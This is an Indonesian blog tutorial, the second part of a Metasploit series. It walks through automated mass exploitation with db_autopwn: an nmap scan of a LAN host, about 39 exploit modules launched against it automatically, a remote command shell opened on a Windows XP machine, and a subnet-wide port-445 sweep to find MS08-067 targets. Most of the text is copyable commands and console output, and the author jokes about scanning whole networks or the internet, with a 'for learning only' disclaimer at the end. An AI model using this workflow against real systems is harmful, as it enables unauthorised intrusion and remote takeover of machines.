Free Your Soul: Metasploit In Actions Part 2

Artikel ini merupakan lanjutan dari artikel sebelumnya yaitu Metasploit I : Teknik Dasar. Dalam artikel yang kedua ini saya ingin membahas mengenai penggunaan metasploit untuk mass exploitation dengan menggunakan db_autopwn.
Sebelumnya pastikan instalasi metasploit kita sudah terintegrasi terlebih dahulu dengan database (bisa menggunakan MySQL, postgre, ataupun SQLite3) dan nmap. Prosedur instalasinya silahkan anda lihat disini.
Metode mass exploitation pertama yang akan saya gunakan dalam artikel ini menggunakan teknik mass exploit pada satu mesin dengan memanfaatkan vulnerability di seluruh layanan server/port yang terbuka, atau kita istilahkan pendekatan secara vertikal (istilah ini ndak akan ketemu kalo mbuka-mbuka kamus eksploitasi sistem, lha wong istilahnya made in indo hahaha.. ). Model pendekatan yang lain juga akan dicoba (secara singkat) di bawah artikel ini.

Metode mass exploit secara vertikal
Ya dah langsung kita coba aja ke satu mesin yang sudah kita siapkan sebelumnya.

- Jalankan metasploit console dari shell :

$ sudo msfconsole

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.3-dev
+ -- --=[ 359 exploits - 233 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 132 aux

- Jalankan plugin mysql terlebih dahulu (saya menggunakan mysql database)

msf > load db_mysql

[*] Successfully loaded plugin: db_mysql

- Sambungkan metasploit dengan database di MySQL

msf > db_connect msf:msf@localhost/metasploit
msf >

- Scan mesin target menggunakan nmap untuk melihat port yang terbuka.
Hasil scan ini akan tersimpan otomatis kedalam database yang telah disiapkan sebelumnya.

msf > db_nmap -v -sS 192.168.1.10

[*] exec: "/usr/bin/nmap" "-v" "-sS" "192.168.1.10" "-oX" "/tmp/dbnmap20090404-13424-19l1thf-0"
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-04 17:35 CIT
NMAP: Initiating ARP Ping Scan at 17:35
NMAP: Scanning 192.168.1.10 [1 port]
NMAP: Completed ARP Ping Scan at 17:35, 0.00s elapsed (1 total hosts)
NMAP: Initiating Parallel DNS resolution of 1 host. at 17:35
NMAP: Completed Parallel DNS resolution of 1 host. at 17:35, 0.00s elapsed
NMAP: Initiating SYN Stealth Scan at 17:35
NMAP: Scanning 192.168.1.10 [1715 ports]
NMAP: Discovered open port 1723/tcp on 192.168.1.10
NMAP: Discovered open port 3389/tcp on 192.168.1.10
NMAP: Discovered open port 139/tcp on 192.168.1.10
NMAP: Discovered open port 1025/tcp on 192.168.1.10
NMAP: Discovered open port 1026/tcp on 192.168.1.10
NMAP: Discovered open port 445/tcp on 192.168.1.10
NMAP: Discovered open port 1043/tcp on 192.168.1.10
NMAP: Discovered open port 12345/tcp on 192.168.1.10
NMAP: Discovered open port 1521/tcp on 192.168.1.10
NMAP: Discovered open port 135/tcp on 192.168.1.10
NMAP: Discovered open port 3372/tcp on 192.168.1.10
NMAP: Discovered open port 1433/tcp on 192.168.1.10
NMAP: Completed SYN Stealth Scan at 17:35, 0.67s elapsed (1715 total ports)
NMAP: Host 192.168.1.10 appears to be up ... good.
NMAP: Interesting ports on 192.168.1.10:
NMAP: Not shown: 1703 closed ports
NMAP: PORT STATE SERVICE
NMAP: 135/tcp open msrpc
NMAP: 139/tcp open netbios-ssn
NMAP: 445/tcp open microsoft-ds
NMAP: 1025/tcp open NFS-or-IIS
NMAP: 1026/tcp open LSA-or-nterm
NMAP: 1043/tcp open boinc
NMAP: 1433/tcp open ms-sql-s
NMAP: 1521/tcp open oracle
NMAP: 1723/tcp open pptp
NMAP: 3372/tcp open msdtc
NMAP: 3389/tcp open ms-term-serv
NMAP: 12345/tcp open netbus
NMAP: MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
NMAP:
NMAP: Read data files from: /usr/share/nmap
NMAP: Nmap done: 1 IP address (1 host up) scanned in 0.872 seconds
NMAP: Raw packets sent: 1716 (75.502KB) | Rcvd: 1716 (78.932KB)
msf >

- Untuk mengetahui opsi-opsi db_autopwn, bisa dilihat terlebih dahulu dari menu help-nya. Silahkan anda coba dan pelajari opsi-opsi tersebut dengan berbagai kombinasi yang anda inginkan

msf > db_autopwn -h

[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disbale exploit module output
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
msf >

- db_autopwn akan kita jalankan menggunakan modul-modul exploit yang sesuai dengan port-port yang sebelumnya telah tersimpan di database

msf > db_autopwn -p -t

[*] Analysis completed in 6.07385802268982 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Lakukan exploitasi system dengan menambahkan opsi -e :

msf > db_autopwn -p -t -e

[*] Analysis completed in 6.27089881896973 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] (3/39): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] (13/39): Launching exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] (14/39): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Connecting to the server...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Authenticating as user 'Administrator'...
[*] (15/39): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] (16/39): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] (17/39): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] (18/39): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (19/39): Launching exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] (20/39): Launching exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] (23/39): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] (24/39): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] (25/39): Launching exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] (26/39): Launching exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[-] Exploit failed: wrong number of arguments (1 for 0)
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] (27/39): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] (28/39): Launching exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (30/39): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Server appears to have been patched
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:46451 -> 192.168.1.10:29595)
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] (31/39): Launching exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] (34/39): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] (35/39): Launching exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Eksploitasi telah selesai. Periksa session yang aktif dengan menuliskan perintah session -l. Apabila ada message no active session berarti eksploitasi yang kita lakukan gagal.

msf > sessions -l

Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.6:46451 -> 192.168.1.10:29595

- Dari message diatas diketahui eksploitasi telah berhasil dilakukan dan ada 1 sesi yang aktif, yaitu session dengan id 1. Untuk berinteraksi dengan session yang aktif :

msf > sessions -i 1

[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

C:\WINDOWS\system32>ipconfig

ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.254
C:\WINDOWS\system32>

Owned… !!

Metode mass exploit secara horisontal / linier
Sebenarnya cara yang dipakai dalam metode ini sama dengan metode sebelumnya, yang membedakan adalah model pencarian port yang terbuka. Cara ini lebih fokus kepada pencarian kelemahan sistem pada port tertentu dalam suatu network. Jadi yang pegang peranan dalam pemilihan metode ini sebenarnya adalah pada kustomisasi command di nmap. Contoh paling mudah yaitu memanfaatkan exploit MS Windows MS08-067 seperti artikel terdahulu. Test case kali ini memanfaatkan exploit tersebut di dalam network lokal saya : 192.168.1.0/24.
Silahkan anda ikuti saja tutorial seperti metode yang diatas hanya saja command pencarian port yang terbuka diubah menjadi :

msf > nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24

[*] exec: nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24
Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-05 17:06 CIT
Interesting ports on 192.168.1.6:
PORT STATE SERVICE
445/tcp closed microsoft-ds
Interesting ports on 192.168.1.10:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
Interesting ports on 192.168.1.12:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:11:2F:A6:03:9F (Asustek Computer)
Interesting ports on 192.168.1.20:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:8C:CC:07:2A (Asustek Computer)
Interesting ports on 192.168.1.26:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:04:23:6E:EC:AD (Intel)
Interesting ports on 192.168.1.28:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Interesting ports on 192.168.1.30:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:EC:79:94:F7 (Compal Information (kunshan) CO.)
Interesting ports on 192.168.1.103:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:18:DE:07:3D:91 (Intel)
Interesting ports on 192.168.1.254:
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:1D:7E:27:BA:E6 (Cisco-Linksys)
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.566 seconds
msf >

Apabila anda masih mengalami kesulitan dalam menerapkan metode ini, silahkan anda baca artikel yang juga sudah lengkap dengan step by step-nya dari blog temen-temen kecoak disini atau blognya pakde HDM disini.

Nah… sekarang coba anda bayangkan, gimana kalo kedua metode tersebut digabung? Dalam artian melakukan scaning ke SEMUA port terbuka dalam suatu network? Atau malah scanning ke network berkelas A.. Silahkan anda bayangkan sendiri.. :D
Kalo bayangan saya ya kompi anda pasti hang apalagi kalo resource hardwarenya pas-pasan kaya saya ini hehehe.. Atau malah lebih sadis lagi kalo anda gunakan untuk scanning di internet bisa-bisa diblokir ma ISP-nya haha….
Sebenarnya teknik-teknik ini kurang bagus, karena eksploitasi yang dilakukan tergolong ngawor, karena dengan hanya ber-ASUMSI pada port terbuka, maka db_autopwn akan menjalankan SEMUA modul yang ada dengan spesifikasi port tersebut, ndak peduli modul yang dipanggil relevan apa tidak dengan vulner/sistem yang terkait.
Supaya eksploitasi sistem lebih fokus dan terarah dapat juga menggunakan tools nessus, karena kita dapat memanfaatkan cross referencing mode (opsi -x) di db_autopwn. Artikelnya nyusul yah, karena laptop ini belum ada nessusnya. Abis fresh install :D

Seperti biasa, use this article wisely. Saya ndak akan nulis artikel ini utk tujuan pendidikan semata, penulis tidak bertanggung jawab bla..bla..bla.. Tapi saya lebih suka menggugah kesadaran anda saja.

WARNING!!!!!! INI HANYA UNTUK PEMBELAJARAN SEMATA, MOHON JANGAN DISALAH GUNAKAN!!!

Free Your Soul

Wellcome...

Labels

Saturday, March 20, 2010

Metasploit In Actions Part 2

2 comments:

Post a Comment

Total Pageviews

Cuaca Hari ini

Popular Posts

Blog Archive

Chit ChaT

Leave comment

Contributors

Followers